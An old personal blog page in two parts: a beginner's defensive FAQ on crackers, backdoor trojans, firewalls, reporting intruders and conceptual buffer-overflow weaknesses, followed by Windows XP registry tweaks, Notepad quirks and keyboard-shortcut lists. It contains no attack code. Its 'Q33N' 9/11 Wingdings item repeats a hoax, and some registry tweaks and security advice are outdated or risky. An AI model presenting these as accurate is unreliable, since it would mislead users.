Social Icons

Pages

Featured Posts

Monday, June 15, 2009

What are hackers?

Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Under such a definition, I would gladly brand myself a hacker. (There is in fact more to it than that - hackerdom is an entire culture in its own right.) However, most people understand a hacker to be what is more accurately known as a 'cracker'. Worryingly, people tend to prefer to use the word 'hacker' over the more technically correct 'cracker'. This means that many are afraid to use the word for its correct meaning. On this website, when I refer to a hacker, I actually mean a cracker. This is because I prefer to use language that I feel most people understand, rather than language that is technically correct. If you want to know what a cracker is, please read ahead to the next section...

What are crackers?

Crackers are people who try to gain unauthorised access to computers. This is normally done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for accessing a computer. Obviously, a good protection from this is to change passwords regularly. Another good move is the use of software that supports intruder lockout, where no further passwords are accepted after a certain number of bad passwords have tried. Even the correct password wouldn't allow access. Such blocks are normally released after a period of time has elapsed (eg 15 minutes). Of course, an even better idea is never to put security-sensitive resources on the Internet in the first place. If you don't want something to be accessed from the Internet, then make it so that it is only accessible from your local network, or even just from one computer. However, backdoor programs are programs that can expose files to the Internet that were never meant to be shared with other people. You can protect yourself from these by using a firewall and a good up-to-date anti-virus program. You would normally get such a backdoor program by opening an e-mail attachment containing the backdoor program. It is normal for such a backdoor program to send out more copies of itself to everyone in your address book, so it is possible for someone you know to unintentionally send you a malicious program. Note that this can normally only be done if you are using Microsoft Outlook or Outlook Express. A few backdoor programs can work with any e-mail program by sitting in memory and watching for a connection to a mail server, rather than actually running from within a specific mail program. If you do use Outlook or Outlook Express, and you do not have the correct security patches installed, it may be possible for a malicious program to be executed from an e-mail when you receive it, without the need for you to click on any attachments. Note that the same bug also affects Internet Explorer. A security patch is available for this, but personally I would advise that you use different mail and web browsing software. There are other ways of cracking as well, some more widespread than others. See How do hackers hack? for more information. Note that on most of this website, I refer to 'hackers' instead of 'crackers'. I mean 'crackers'. I explain this in more detail above.

What damage can a hacker do?

This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information. Some backdoor programs even allow a hacker to listen in on your conversations using your computer's microphone if one is attached! Hackers can do great damage to your computer. They could delete vital files from your hard disk, without which your computer could not work. However, you can re-install these from backups (you do keep backups, don't you?) In theory, the absolute worst damage a hacker could do is turn your computer into a large paperweight. It is possible - the CiH virus demonstrated how. This virus attacked your computer using the then new Flash BIOS technology. This capability was intended to be used to upgrade your computer's BIOS. (The BIOS is a program stored on a chip inside your computer. It controls quite a lot of low-level stuff and is a very vital part of your computer. It is the BIOS that does all the memory checks when you turn on, and also performs the first stage in loading your operating system.) However, the virus used this 'feature' to destroy the BIOS. Without the BIOS, the computer can't work. The only way to recover from this would be to replace your computer's motherboard. At the time of writing this, there are no backdoor programs that can do the same thing, but it is easy enough for a hacker to install a virus that does. Since the CiH virus, many BIOSs have a "flash write protect" option in BIOS setup, and/or a jumper setting on the motherboard that has a similar effect. See your motherboard manual for details.

How does a firewall protect me?

Basically, firewalls protect your computer from unauthorised access attempts. There are two kinds of firewall. Networked computers tend to be connected to the Internet through just one or two computers (hence only one Internet connection is required). These computers behave as firewalls by blocking any unauthorised packets. Any other packets are passed on to the computer they are intended for. This kind of firewall is called a corporate firewall. The kind of firewall you may be more familiar with is a personal firewall- this is a program that runs on your computer, and blocks any unauthorised incoming packets. Personally, I use ZoneAlarm. The great thing about ZoneAlarm is that it is easy to configure. Also, it only allows chosen programs to access the Internet- allowing you to block hackers that use standard protocols such as FTP. In case of emergency, it also has an emergency stop button, which allows you to block allfree by private individuals and charities. Businesses, governments, and educational institutions can download ZoneAlarm on the basis of a 60-day free trial. See ZoneLab's website for more information. access to the Internet immediately. ZoneAlarm can be downloaded and used for Remember that although a firewall stops hackers from getting in, it will not remove any existing 'backdoor' software from your machine. For this, you need a good anti-virus product like Norton or Sophos. Also make sure that you use your anti-virus software regularly, and that you keep it up-to-date.

How do I report hackers?

When an access attempt occurs, if you have alert popups turned on, ZoneAlarm will tell you the IP address of the possible hacker. This looks something like 123.123.123.123 (example only). You can use this information to track down and report hackers to their ISP. Bare in mind that you are unlikely to get any response apart from a simple acknowledgement- they have to deal with hundreds of reports like yours every day. Here is a rough guide of how to report hackers (note: some of the programs referred to are only available in Windows):

1. Make a note of all the information ZoneAlarm gives you. If possible, use ZoneAlarm's text log option- many ISPs prefer text log format (personally, I supply ZoneAlarm's text log and an English translation).

2. Select Start, Run... In the Run box, type in "winipcfg" and then click OK. This will tell you what your IP address is (among other things). Write down the IP address.

3. Use an Internet tool like SamSpade's address digger to look up which ISP uses the IP address given in your firewall's log.

4. This will return a lot of technical information. Some ISPs add remarks to this information telling you where to send abuse reports to. Make a note of any such e-mail addresses. If there is no such information, look at the official name for the server (near the top), or the names of the domain name servers. To convert these to an e-mail address, remove everything before the first period, including the period itself, then add 'abuse@' in front of it.

5. Now send an e-mail to the abuse address(es) you have. If the recipient obviously isn't English (eg if the e-mail address ends in .de (Germany) or .fr (France)), write it in their language, if you know it. If not, don't worry, most people speak at least a little English, and the technical language of computers is the same almost anywhere you go!

6. Include in the message what ZoneAlarm told you. Also include your own IP address (this is what winipcfg told you), the date, the time, your time zone (in relation to GMT), and an indication of how accurate your computer's clock is (eg if you set it by the atomic clock every day, say so!)

What is a port scan?

A port scan is, quite simply, a test to see if a computer exists and responds to access attempts on a certain port (eg TCP port 80, used by the HTTP protocol). Port scans, on their own, are quite harmless and have many legitimate uses. However, they also have a malicious use, which is to test to see if any particular backdoor software is running on a computer for the purposes of then using such backdoor software. In my Internet logs, I include all unauthorised port scans of my computer. I tend to describe these port scans as hack attempts, since it is most likely that this is what they are. To be absolutely pedantic, I shouldn't really describe them as such, since there may be other explanations.

What is an IP address?

An IP address is a number that can uniquely identify any computer on the Internet. With the current Internet protocol (IPv4), an IP address is a 32-bit number. That means that as a binary number, it would be stored as 32 ones and zeroes. There are 4,294,967,296 possible IP addresses. However, we humans tend to split IP addresses into four 8-bit numbers, express these numbers using our decimal number system, and separate them with dots. With 8-bit numbers, each number must be a whole number in the range 0 to 255, inclusive. For example, an IP address of 2,071,690,107 would probably be expressed as 123.123.123.123 (example only). Some people might express an IP address in hexadecimal as well (7B7B7B7Bh in this case). The dotted IP address is by far the most common, however. As the Internet grows, plans are being made to increase the size of IP addresses. (The "next" Internet protocol, IPv6, uses 128-bit IP addresses.) The problem with that, of course, is that quite a few Internet protocols would need to be rewritten, since they are designed to work with 32-bit IP addresses. This includes the Internet Protocol itself (IP). Thankfully, Internet packets include an IP version flag, so it would be possible to have both old and new implementations of the IP communicate with each other. (The newer implementation would use the older protocol when communicating with older implementations. Implementations of the IP would know whether a computer was using the older or newer protocol from the version flag. Unfortunately, older implementations would not be able to access anything outside of the 32-bit IP range.) IP addresses can be statically or dynamically allocated. Statically allocated IP addresses always refer to the same computer. However, dynamically allocated IP addresses can refer to different computers at different times. For example, if you have a dial-up Internet connection, your IP address doesn't become unused when you hang up- it is allocated to someone else. When you reconnect, you are allocated a new IP address. This is dynamic allocation.

How can I hack?

I don't like that first person pronoun... I don't mind explaining how hackers hack, but I won't explain how you can hack. This is not a pro-hacking website. This is a computer security site. My aim is not to encourage or assist hacking in any way. I aim to try to inform people of the risks that they may be exposed to, so that they can better protect themselves from these risks. I also provide this website as a resource for those with an academic interest. If you want a rough idea of some of the cracking methods that other people (not you) use, just read on to the next section.

How do hackers hack?

There are many ways in which a hacker can hack. The most common way is by using a backdoor program. See What damage can a hacker do? for more information on these. However, there are some 'special' cases. Click a link below for more information. NetBIOS - UDP 137, UDP 138, TCP 139

ICMP Ping - Internet Control Message Protocol

FTP - TCP 21

rpc.statd - TCP 111, TCP 9704

lpr - TCP 515

HTTP - TCP 80

How can NetBIOS be harmful?

NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor program running on your computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet - so a hacker can access your machine remotely. Not all Windows computers are vulnerable to this kind of attack. If you have a firewall that blocks incoming NetBIOS packets, you are safe. Some network configurations will also be immune. To find out whether you are vulnerable, visit GRC's ShieldsUP!, and click the "Test My Shields!" image half way down the page. Note that GRC will attempt to connect to your computer using NetBIOS - this is just to test whether your computer is vulnerable. GRC will not retain any information about your computer, nor will any damage be done. NetBIOS uses TCP port 139, UDP port 137 and UDP port 138.

How can ICMP Ping be harmful?

ICMP is one of the main protocols that makes the Internet work. It standards for Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, then the hacker could then launch a more serious form of attack against a computer. People who do have firewalls normally don't bother to report pings, because they are innocent in themselves - allowing the hacker to continue hacking for quite a long period of time.

How can FTP be harmful?

FTP is a standard Internet protocol, standing for File Transfer Protocol. You might use it for file downloads from some websites. If you have a web page of your own, you might use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers... FTP normally requires some form of authentication for access to private files, or for writing to files. Hackers can get round this by using programs called "backdoor programs". You wouldn't know if you had one of these, unless you used an up-to-date virus scanner regularly. You could get a backdoor program by opening an infected E-mail attachment. FTP backdoor programs, such as Doly Trojan, Fore, and Blade Runner, simply turn your computer into an FTP server, without any authentication. Using a known protocol such as FTP is easier for hackers because the protocol is already defined - not so much new software needs to be written to use it (a normal FTP client could be used - the hacker wouldn't need any specialist software). Also, since FTP has legitimate uses, many firewalls do not block it. Luckily, ZoneAlarm does.

How can rpc.statd be harmful?

This is a problem specific to Linux and Unix. I am not too sure with what precisely rpc.statd should be used for. I do, however, know that it is used by hackers. rpc.statd is typically used as a 'file locking status monitor' (whatever that is) on local area networks. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and the data is written into parts of memory it shouldn't be in. This can cause crashes of various different kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hacker's evil deeds. That is the problem. rpc.statd uses TCP ports 111 and 9704.

How can lpr be harmful?

This is a similar problem specific to Linux and Unix. lpr is typically used as a printing system. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem (again). See rpc.statd for more information on this problem. Basically, the result of this problem is that data can be written into parts of memory it shouldn't be written to. A skilled hacker could write program code into memory to perform his evil deeds. lpr uses TCP port 515.

How can HTTP be harmful?

HTTP stands for HyperText Transfer Protocol. It is one of the main protocols used on the Internet- it is what you are using right now to view this web page. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an 'unchecked buffer overflow'. If a user makes a request for a file on the web server with a very long name, parts of the request get written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server. The Code Red worm takes advantage of this. This worm even managed to infect the Microsoft Windows Update site at one point. Despite what I have just said, it is still possible for home users to become infected with such worms, since some people install Personal Web Server without knowing what it is. Some computers even have PWS pre-installed when you buy them. To see if PWS is running on your computer, hover your mouse over each of the icons in the bottom right corner of your screen, until a small description appears. If one of the icons is PWS, right-click it and choose to exit. Then, use Add/Remove Programs in Control Panel to remove the program from your system. Microsoft Personal Web Server is used to serve web pages directly from your computer to the rest of the world. Of course, you would need to be connected to the Internet 24 hours a day in order to do this. Most people will tend to upload Internet material to their ISP, rather than provide access to it directly from their own computer. And just to clear up any remaining confusion: Microsoft Personal Web Server is not required to surf the Internet- all you need to surf the Internet is a web browser and an Internet connection (such as dial-up).

Windows Tricks

Set Processes Priority

Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.

CTRL-SHIFT-ESC
1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option

2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s
Shutdown Trick !

Imidiate rapid shut down window
while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ' Ctrl ' key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.


Speed Up Ur Shut down !!


Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200).

and !

Like previous versions of windows, it takes long time to restart or shutdown windows xp when the "Exit Windows" sound is enabled. to solve this problem you
must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on "Exit Windows" sub-menu and highlight it.now from sounds you can select,choose "none" and then click apply and ok. now you can see some improvements when shutting down your system.


**new **
Crazy !!
Hide ur folders.. never known trick !!!!!!!!!! Disguise them to "Recycle Bin"


Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
eg,
if u've a folder games
press F2,
then type, "games.{645FF040-5081-101B-9F08-00AA002F954E}"
c the magic....
then 2 get to original form,
remove the extension using
"ren games.{645FF040-5081-101B-9F08-00AA002F954E} games" in dos or as a bat file


n u are done..

~cheers~


System information


system up time only for xp professional edition
It boasts how long it can stay up. Whereas previous
versions of Windows were coy about how long they went
between boots, XP is positively proud of its stamina.
Go to the Command Prompt in the Accessories menu from
the All Programs start button option, and then type
'systeminfo'. The computer will produce a lot of
useful info, including the uptime. If you want to keep
these, type 'systeminfo > info.txt'. This creates a
file called info.txt you can look at later with
Notepad. (Professional Edition only).


lock pc just by double clicking mouse

You can lock your XP workstation with two clicks of
the mouse. Create a new shortcut on your desktop using
a right mouse click, and enter 'rundll32.exe
user32.dll,LockWorkStation' in the location field.
Give the shortcut a name you like. That's it -- just
double click on it and your computer will be locked.
And if that's not easy enough, Windows key + L will do
the same.



SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)


Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast
and almost as good as notepad..


Remove Stored username and Passwords !

To remove the Stored User Names and Passwords from your system, try this:
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords

It Works

~ Cheers ~


*

Remove the Username and picture from Windows XP New Start Menu

The User account picture can be removed by turning off the Welcome Screen. Or, by switching to Windows Classic theme. Follow the method described in this article if you want to remove the username and picture from the Start Menu, without disabling the Welcome Screen and Windows XP Theme.

For those who want to remove the user name and user account picture from Start Menu, in order to have a blank blue panel at the top, try this:
Start Windows Explorer and go to this folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

From that folder, rename the BMP file which corresponds to your user account.
( For example, if your username is Robert, rename Robert.bmp to old_Robert.bmp )
Next, rename the following folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures

to something else, say...

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\No_Default Pictures
To remove the user name, follow these steps

Start regedit.exe and navigate to the this key:

HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Policies \ Explorer
In the right-pane, set NoUserNameInStartMenu value-data to 1

Close Regedit.exe and restart Windows.

You'll end up with a blue space at the top of the Start Menu.



To get back the username and the picture, reverse the above procedure.



For the New Start Menu, Windows XP looks for the .bmp file in the folder

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

If the file is not found, it takes a picture from the "Default Pictures" sub-folder. By renaming the .bmp and the "Default Pictures" folder, you're giving no chance for Windows to fetch an image for the Start Menu

~ Cheers ~.


Notepad Trick ! for complete list move to NOTEPAD TRICKS page !!

Well quite old but here is d complete collection

Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.

Voilla!!

or

1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.

or

Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...


NOTEPAD "world trade centre trick".. :Rahul


Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.

log trick !! make ur Notepad a diary !!

Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

WHY?

The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

~ cheers ~


SPEED UP MENU DISPLAY.!!


When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.

Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.

Navigate to HKEY_CURRENT_USER\Control Panel\Desktop
Select MenuShowDelay from the list on the right.

Right on it and select Modify.
Change the value to 0.
Reboot your computer.



CLICKING * .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE.!!


Well windows seem to have a REALLY big problem when it comes to reading AVI files. It seems that when you click on an AVI file in explorer, it'll try to read the entire AVI file to determine the width,height, etc. of the AVI file (this is displayed in the Properties window). Now the problem with Windows is that if you have a broken/not fully downloaded AVI file that doesnt contain this info, Windows will scan the entire AVI file trying to figure out all these properties which in the process will probably cause 100% CPU usage and heavy memory usage. To solve this problem all you have to do is the following:
1. Open up regedit
2. Goto HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler
3. Delete the "Default" value which should be "{87D62D94-71B3-4b9a-9489-5FE6850DC73E}"
Voila! Please not that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.
NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly. Also, I cannot be held resposible. Backup your registry first.

CD ROM STOPS AUTOPLAYING/AUTORUN.!!


And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.
Solution: The service: "Shell Hardware Detection" has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to "Automatic".

How to make your Desktop Icons Transparent

Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop"


DISPLAY MESSAGE ON STARTUP.


Start regedit, if you are unfamiliar with regedit please see our FAQ.
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say. Restart


AUTO DELETE TEMPORARY FOLDER.!!

ll what i prefer is %temp% " without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..


First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.


make ur pdf files to speak

make ur pdf files to speak
here r the shortcuts for hearing pdf files in abobe reader 6.0 or higher

ctrl+shift+b ---->to hear the whole topic
ctrl+shift+v ---->to hear the page

Key Board Shortcuts ( Quite an Exhaustive List )



What is the allure of keyboard shortcuts? Do they really save time? Why bother since my mouse is permanently attached to my hand?

I like to use keyboard shortcuts, especially if someone is watching me, because they make me look like a pro. With just a few key strokes I can leave a mouser spinning his wheel! Whatever your motivation, here's a big list of keyboard shortcuts:

GENERAL SHORTCUTS
ALT- F4 - Quit a program / Shut down
ALT-TAB - Hold down the ALT key and hit tab to cycle through open windows.
CTL-ESCAPE - Display the Start menu
SHIFT - TAB - tab backwards through a form
CTRL - X - Cut
CTRL - C - Copy
CTRL - V - Paste
F1 - Help menu
CTRL - Z - Undo
SHIFT & Restart - To restart just windows and not your whole computer, hold down the shift key when you click the OK button on the shutdown screen. Saves lots of time. (not for XP)
CRTL-TAB - Navigate tabs on a tabbed screen

FILE & DESKTOP SHORTCUTS
Hold SHIFT while inserting a CD - Prevents the CD from "autorunning"
If an item is selected:
CTRL while dragging a file - Copies the file
CTRL - SHIFT while dragging a file - Creates a shortcut to the file
SHIFT - DELETE - Deletes an item without sending it to the recycle bin.
ALT-ENTER - Display a file's properties.
F2 - To rename the file
In Windows Explorer:
LEFT ARROW - Collapse the current selection if it is expanded
NUM LOCK-MINUS SIGN (-) - Collapse the selected folder
RIGHT ARROW - Expand the current selection if it is collapsed -Or- Select the first subfolder
NUM LOCK- * Expand all folders below the current selection
NUM LOCK- PLUS SIGN (+) - Expand the selected folder
F6 - Switch between left and right panes
In My Computer:
BACKSPACE - View the folder one level up
ALT- RIGHT ARROW - Move forward to a previous view
ALT- LEFT ARROW -Move backward to a previous view

INTERNET BROWSER SHORTCUTS
For Internet Explorer 6 and Netscape 7 (may work in older versions)
Open History Window Ctrl+H
Reload Ctrl+R
Back (Previous Page) Alt+Left Arrow or Alt+Backspace
Forward (Next Page) Alt+Right Arrow
Stop Esc
Home Alt+Home
Go to Bottom of Page End
Go to Top of Page Home
New Window Ctrl+N
Close WIndow Ctrl+W
Go Up one Line Up Arrow
Go Down One Line Down Arrow
Full Screen (toggle) F11
Find on Page Ctrl+F
Add Current Page to Favorites Ctrl+D

Print Current Page
or Active Frame Ctrl+P

Organize Favorites (IE)/ Manage Bookmarks (NS)
Ctrl+B
Maximize a Window Alt+Space+x
Minimize a window Alt+Space+N
Scroll page up Alt+Up Arrow
Scroll page down Alt+Down Arrow

Internet Explorer ONLY
Open Favorites Bar Ctrl+I
Select text in address bar Alt+D

Force Reload (not from cache) Ctrl+F5

A faster way to type in addresses with IE is to just type in the name of the site:
worldstart
and hit CTRL + Enter. The "http://www. " and ".com" will be added for you!
Netscape ONLY
Open / Close Sidebar Panel (toggle) F9
Select text in Location Bar Ctrl+L
Force Reload (not from Cache) Ctrl+Shift+R
Zoom Text Smaller Ctrl+- (minus)
Zoom text larger Ctrl+= (plus sign)


WINDOWS KEY SHORTCUTS
The Windows key can be used in conjunction with other keys to act as a keyboard shortcut for faster access to menu commands. Now, while the Alt key tends to open program menus (ex: Alt+F opens the File menu and Alt+E opens the Edit menu) and the Ctrl key performs actual operations (ex: Ctrl+C will copy and Ctrl+V will paste), the Windows key will open various Windows tools...
Win key + R will open the Start menu's Run box
Win key + F will open the Start menu's Find window
Win key + E will quickly launch Explorer
Win key + Pause/Break will open the System Properties window
Win key + M will Minimize all windows
Win key + Shift + M will undo Minimize all windows
Win key + D will switch between minimizing all open programs and showing them all
Win key + Tab will cycle through items on the taskbar
Win key by itself will open the Start menu
You can also open programs or folders on your desktop by pressing the Windows key + the first letter of the program/folder/shortcut + Enter . Sounds kinda tedious, but if you're in a bind with your mouse, it can come in quite handy.
ARROW TRICKS
Here's a cool little arrow trick to try with word processing programs. Next time you're using your arrow keys to go from one area of a sentence to another (left and right arrows), hold down your CTRL key. Instead of moving one space at a time, you'll go one word at a time.
If you're using the up and down arrows to go from line to line, holding down the CTRL key will make your cursor jump from paragraph to paragraph (well, from carriage return to carriage return anyway).
One last thing, if you hold down the SHIFT key while you do this (i.e. hold down SHIFT + CTRL at the same time), you select text as you arrow along.
I've tested this in MS Word and Wordpad, but it *should* work no matter what word processing program you use. HOME / END KEY FUN
Do you ever find yourself scrolling through a huge folder ? Well, if you need to get to the beginning or the end quickly, just press Ctrl+Home . If you want to get to the end, click Ctrl+End.

Hey, that's not all!
This little trick works on more than just folders. If you use the Home key in a word processor, it goes to the beginning of the line you're currently working on. If you hit the END key, it should head to the end of the current line. If you pair Home & End up with the Ctrl key in a word processor, you will be whisked away to the beginning or end of the document. Again, this should work, but it depends on your word processor.


Speedup your work by using keyboard more and mouse less.

Useful Shortcut:

Start + M: Minimizes all open windows
Start + Shift + M: Maximizes All Windows
Start + E: Runs Windows Explorer
Start + R: Open the RUN Dialog Box
Start + F: Open the Search Results Dialog box
Start + CTRL + F: Opens the Search Results-Computer dialog Box (if the computer is connected to a network)
Start + Pause (Break): Opens the System Properties Dialog Box

Windows System Key Combinations:

F1: Help
CTRL + ESC: Open Start menu
ALT + TAB: Switch between open programs
ALT + F4: Quit program
SHIFT + DELETE: Delete item permanently

Windows Program Key Combinations:

CTRL + C: Copy
CTRL + X: Cut
CTRL + V: Paste
CTRL + Z: Undo
CTRL + B: Bold
CTRL + U: Underline
CTRL + I: Italic

Mouse Click/Keyboard Modifier Combinations for Shell Objects:

SHIFT + right click: Displays a shortcut menu containing alternative commands
SHIFT + double click: Runs the alternate default command (the second item on the menu)
ALT + double click: Displays properties
SHIFT + DELETE: Deletes an item immediately without placing it in the Recycle Bin

General Keyboard-Only Commands:

F1: Starts Windows Help
F10: Activates menu bar options
SHIFT + F10: Opens a shortcut menu for the selected item (this is the same as right-clicking an object
CTRL + ESC: Opens the Start menu (use the ARROW keys to select an item)
CTRL + ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
ALT + DOWN ARROW: Opens a drop-down list box
ALT + TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
ALT + SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
ALT +- (ALT + hyphen): Displays the Multiple Document Interface (MDI)child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
CTRL + TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
ALT + underlined letter in menu: Opens the menu
ALT + F4: Closes the current window
CTRL + F4: Closes the current Multiple Document Interface (MDI) window
ALT + F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed
ALT + F6: switches between the Find dialog box and the main Notepad window)

Shell Objects and General Folder/Windows Explorer Shortcuts For a selected object:

F2: Rename object
F3: Find all files
CTRL + X: Cut
CTRL + C: Copy
CTRL + V: Paste
SHIFT + DELETE: Delete selection immediately, without moving the item to the Recycle Bin
ALT + ENTER: Open the properties for the selected object
To Copy a File: Press and hold down the CTRL key while you drag the file to another folder.
To Create a Shortcut: Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.


General Folder/Shortcut Control:

F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer)
F5: Refreshes the current window.
F6: Moves among panes in Windows Explorer
CTRL + G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only)
CTRL + Z: Undo the last command
CTRL + A: Select all the items in the current window
BACKSPACE: Switch to the parent folder
SHIFT + click + Close button: For folders, close the current folder plus all parent folders


Windows Explorer Tree Control:

Numeric Keypad *: Expands everything under the current selection
Numeric Keypad +: Expands the current selection
Numeric Keypad -: Collapses the current selection.
RIGHT ARROW: Expands the current selection if it is not expanded, otherwise goes to the first child
LEFT ARROW: Collapses the current selection if it is expanded, otherwise goes to the parent


Properties Control:

CTRL + TAB/CTRL + SHIFT + TAB: Move through the property tabs

Accessibility Shortcuts:

Press SHIFT five times: Toggles StickyKeys on and off
Press down and hold the right SHIFT key for eight seconds: Toggles FilterKeys on and off
Press down and hold the NUM LOCK key for five seconds: Toggles ToggleKeys on and off
Left ALT + left SHIFT+NUM LOCK: Toggles MouseKeys on and off
Left ALT + left SHIFT+PRINT SCREEN: Toggles high contrast on and off

Microsoft Natural Keyboard Keys:

Windows Logo: Start menu
Windows Logo + R: Run dialog box
Windows Logo + M: Minimize all
SHIFT + Windows Logo+M: Undo minimize all
Windows Logo + F1: Help
Windows Logo + E: Windows Explorer
Windows Logo + F: Find files or folders
Windows Logo + D: Minimizes all open windows and displays the desktop
CTRL + Windows Logo + F: Find computer
CTRL + Windows Logo + TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
Windows Logo + TAB: Cycle through taskbar buttons
Windows Logo + Break: System Properties dialog box
Application key: Displays a shortcut menu for the selected item


Microsoft Natural Keyboard with IntelliType Software Installed:

Windows Logo + L: Log off Windows
Windows Logo + P: Starts Print Manager
Windows Logo + C: Opens Control Panel
